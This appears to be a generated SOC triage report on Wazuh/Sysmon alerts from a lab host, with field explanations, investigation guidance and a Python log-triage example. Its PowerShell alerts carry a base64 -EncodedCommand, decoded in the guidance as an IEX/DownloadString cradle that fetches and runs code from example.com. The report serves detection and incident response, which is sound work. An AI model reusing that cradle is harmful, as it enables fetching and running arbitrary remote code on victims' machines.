Same false positive as the earlier 92213 hit, one generation down the chain. The TargetFilename is C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f1rrcy3r.32z.ps1, written by powershell.exe itself (same ProcessGuid and PID 15128 as the process-creation alert just above). PowerShell creates a __PSScriptPolicyTest_<random>.ps1 in Temp every time it starts, to test whether an AppLocker/WDAC script policy applies, and removes it afterwards. It is a known benign artifact, not a transferred tool; the only thing it tells you is that another powershell.exe started. Pivot on the ProcessGuid to the EID 1 alert and work the encoded command there, and tune 92213 so powershell.exe writing this file name pattern to Temp no longer scores 15.

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:10.096+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  127
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535370.2781451
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that produced the event. Microsoft-Windows-Sysmon means Sysmon telemetry, not a native Security-log event, so the eventID numbering below is Sysmon's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and is the same on every host, so it is a safer filter key than the name.

data.win.system.eventID:  11
Event ID within the provider. Sysmon numbering: 1 process create, 3 network connection, 7 image load, 10 process access, 11 file create, 13 registry value set, 22 DNS query. Not the Security-log IDs (4624, 4688).

data.win.system.version:  2
Schema version of this event ID's field layout; it changes when Sysmon adds or renames fields, so match it when writing decoders or parsers.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs all telemetry at 4, so this says nothing about how bad the event is; rule.level does.

data.win.system.task:  11
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:08.2961603Z
UTC time the record was written to the event log. Compare with eventdata.utcTime (when the activity happened) and the alert timestamp (when Wazuh indexed it) to measure collection lag; the gap here is seconds, not separate events.

data.win.system.eventRecordID:  350611
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service (3712 here), not the process being reported. That one is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's log; open it in Event Viewer and jump to eventRecordID to see the original entry.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:08.275 ProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} ProcessId: 15128 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f1rrcy3r.32z.ps1 CreationUtcTime: 2025-04-24 22:56:08.275 User: Attacker\Attcker1"
Rendered event text with every eventdata field inline, the same values parsed out below. Handy to paste into a ticket whole; otherwise work from the individual fields.

data.win.eventdata.utcTime:  2025-04-24 22:56:08.275
When the activity itself happened, per Sysmon (UTC, millisecond precision). Anchor the timeline on this, not on the Wazuh timestamp.

data.win.eventdata.processGuid:  {94294ddc-c185-680a-ed0c-000000000e00}
Sysmon's globally unique ID for the process that wrote the file. It equals the ProcessGuid of the process-creation alert just above, so that EID 1 event is the creator; pivot there.

data.win.eventdata.processId:  15128
Windows PID of the writing process. Only unique while the process lives; use processGuid for pivots.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that wrote the file. powershell.exe from System32 here; check who wrote a file before judging the file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f1rrcy3r.32z.ps1
Path of the file that was created. Here __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder: PowerShell writes this on every start to probe AppLocker/WDAC script enforcement and deletes it afterwards. A known benign artifact, not a dropped payload; the interesting part is the ProcessGuid that wrote it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:08.275
File creation timestamp as Sysmon recorded it. If it is earlier than utcTime, an existing file was overwritten rather than newly created; equal (as here) means a fresh file.

data.win.eventdata.user:  Attacker\\Attcker1
Account the writing process ran as. Local account on host Attacker (the domain part equals the hostname).

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
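
An added example (not SOCscribe, Wazuh or Sysmon code) that applies the guidance for both file-creation alerts on this page: recognise PowerShell's script-policy probe file by who wrote it, where, and what it is called, then walk the Sysmon process tree from the file event back to the chain that produced it. The records are trimmed copies of the ProcessGuid, PID, Image and TargetFilename fields from the EID 1 and EID 11 alerts above; the probe-name pattern (a random 8.3 name) and the Temp-folder test are assumptions of this example.

```python
import re
from typing import Dict, List

# Trimmed copies of the Sysmon fields from the EID 1 (process create) and
# EID 11 (file create) alerts on this page. The code is an added example,
# not part of SOCscribe, Wazuh or Sysmon.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EID1 = [
    {"processGuid": "{94294ddc-c181-680a-eb0c-000000000e00}", "processId": 384,
     "parentProcessGuid": "{94294ddc-c17e-680a-e90c-000000000e00}", "parentProcessId": 17020,
     "image": PS_EXE},
    {"processGuid": "{94294ddc-c185-680a-ed0c-000000000e00}", "processId": 15128,
     "parentProcessGuid": "{94294ddc-c181-680a-eb0c-000000000e00}", "parentProcessId": 384,
     "image": PS_EXE},
    {"processGuid": "{94294ddc-c189-680a-f00c-000000000e00}", "processId": 2932,
     "parentProcessGuid": "{94294ddc-c185-680a-ed0c-000000000e00}", "parentProcessId": 15128,
     "image": PS_EXE},
]
EID11 = [
    {"processGuid": "{94294ddc-c181-680a-eb0c-000000000e00}", "processId": 384, "image": PS_EXE,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k4xjswto.1mn.ps1"},
    {"processGuid": "{94294ddc-c185-680a-ed0c-000000000e00}", "processId": 15128, "image": PS_EXE,
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_f1rrcy3r.32z.ps1"},
]

# PowerShell names its policy probe "__PSScriptPolicyTest_" + a random 8.3 name of
# lower-case letters and digits + ".ps1" (assumption of this example; both names on
# this page fit). All three checks must pass: a payload that merely borrows the
# name, is written by another process, or lands outside Temp is not excused.
_PROBE_NAME = re.compile(r"^__PSScriptPolicyTest_[a-z0-9]{8}\.[a-z0-9]{3}\.ps1$", re.IGNORECASE)
_TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
_PS_HOST = re.compile(r"\\(?:powershell|pwsh|powershell_ise)\.exe$", re.IGNORECASE)


def is_ps_policy_probe(image: str, target_filename: str) -> bool:
    """True only for PowerShell's own AppLocker/WDAC script-policy probe file."""
    directory, _, name = target_filename.rpartition("\\")
    return bool(
        _PS_HOST.search(image)
        and _TEMP_DIR.search(directory + "\\")
        and _PROBE_NAME.match(name)
    )


def process_chain(eid1: List[dict], guid: str) -> List[int]:
    """PIDs from the oldest known ancestor down to the process with this GUID.

    Walks parentProcessGuid links (GUIDs are unique; PIDs get reused). The root
    is usually known only as someone's parent, so its PID comes from that field.
    """
    by_guid = {r["processGuid"]: r for r in eid1}
    chain: List[int] = []
    seen = set()
    while guid in by_guid and guid not in seen:  # `seen` guards against cycles in bad data
        seen.add(guid)
        rec = by_guid[guid]
        chain.append(rec["processId"])
        guid = rec["parentProcessGuid"]
        if guid not in by_guid:
            chain.append(rec["parentProcessId"])
    return chain[::-1]


def triage_file_events(eid1: List[dict], eid11: List[dict]) -> List[Dict[str, object]]:
    """One verdict per EID 11 record, with the process chain that produced it."""
    verdicts = []
    for ev in eid11:
        benign = is_ps_policy_probe(ev["image"], ev["targetFilename"])
        verdicts.append({
            "processId": ev["processId"],
            "targetFilename": ev["targetFilename"],
            "verdict": "benign: PowerShell script-policy probe" if benign
                       else "investigate: file written to Temp",
            "chain": process_chain(eid1, ev["processGuid"]),
        })
    return verdicts


if __name__ == "__main__":
    for v in triage_file_events(EID1, EID11):
        print(f'PID {v["processId"]:>5}  chain {" -> ".join(map(str, v["chain"]))}  {v["verdict"]}')
    print("full chain:", process_chain(EID1, "{94294ddc-c189-680a-f00c-000000000e00}"))
```

Both file events come back benign, and the chain walk reconstructs 17020 -> 384 -> 15128 -> 2932 from the three process-creation alerts, which is the unit to contain. The same three-way test (writer, folder, name) is what a Wazuh child rule under 92213 should express before lowering the level; a name-only match would let a payload called __PSScriptPolicyTest_anything.ps1 written by cmd.exe slip through.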

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:12.951+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell
Third generation of the same chain: PID 2932, parent PID 15128, parent of that PID 384, root PID 17020, every one of them powershell.exe running the identical -EncodedCommand. Decoded it is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle that runs whatever the URL serves in memory. Do not work this as a separate alert: tie it to the two earlier process-creation alerts by ParentProcessGuid, find what started PID 17020, and check DNS/proxy and Sysmon EID 3/22 for the fetch. Until the root is stopped each new powershell.exe will relaunch the cradle and rule 92057 will keep firing.

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:12.951+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  124
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535372.2784220
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that produced the event. Microsoft-Windows-Sysmon means Sysmon telemetry, not a native Security-log event, so the eventID numbering below is Sysmon's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's and is the same on every host, so it is a safer filter key than the name.

data.win.system.eventID:  1
Event ID within the provider. Sysmon numbering: 1 process create, 3 network connection, 7 image load, 10 process access, 11 file create, 13 registry value set, 22 DNS query. Not the Security-log IDs (4624, 4688).

data.win.system.version:  5
Schema version of this event ID's field layout; it changes when Sysmon adds or renames fields, so match it when writing decoders or parsers.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose. Sysmon logs all telemetry at 4, so this says nothing about how bad the event is; rule.level does.

data.win.system.task:  1
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:11.0019319Z
UTC time the record was written to the event log. Compare with eventdata.utcTime (when the activity happened) and the alert timestamp (when Wazuh indexed it) to measure collection lag; the gap here is seconds, not separate events.

data.win.system.eventRecordID:  350641
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service (3712 here), not the process being reported. That one is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. No investigative value.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record lives in. Microsoft-Windows-Sysmon/Operational is Sysmon's log; open it in Event Viewer and jump to eventRecordID to see the original entry.

data.win.system.computer:  Attacker
Hostname as recorded by Windows. Should equal agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:09.719 ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} ProcessId: 2932 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c185-680a-ed0c-000000000e00} ParentProcessId: 15128 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:09.719
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c189-680a-f00c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\Users\Attcker1\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c185-680a-ed0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15128
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:13.889+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:13.889+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  128
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535373.2792287
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:11.2971818Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350642
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:11.257 ProcessGuid: {94294ddc-c189-680a-f00c-000000000e00} ProcessId: 2932 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pvs24fpt.wtt.ps1 CreationUtcTime: 2025-04-24 22:56:11.257 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:11.257
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c189-680a-f00c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pvs24fpt.wtt.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:11.257
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:16.392+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:16.392+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  125
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535376.2795052
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:13.9948115Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350673
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

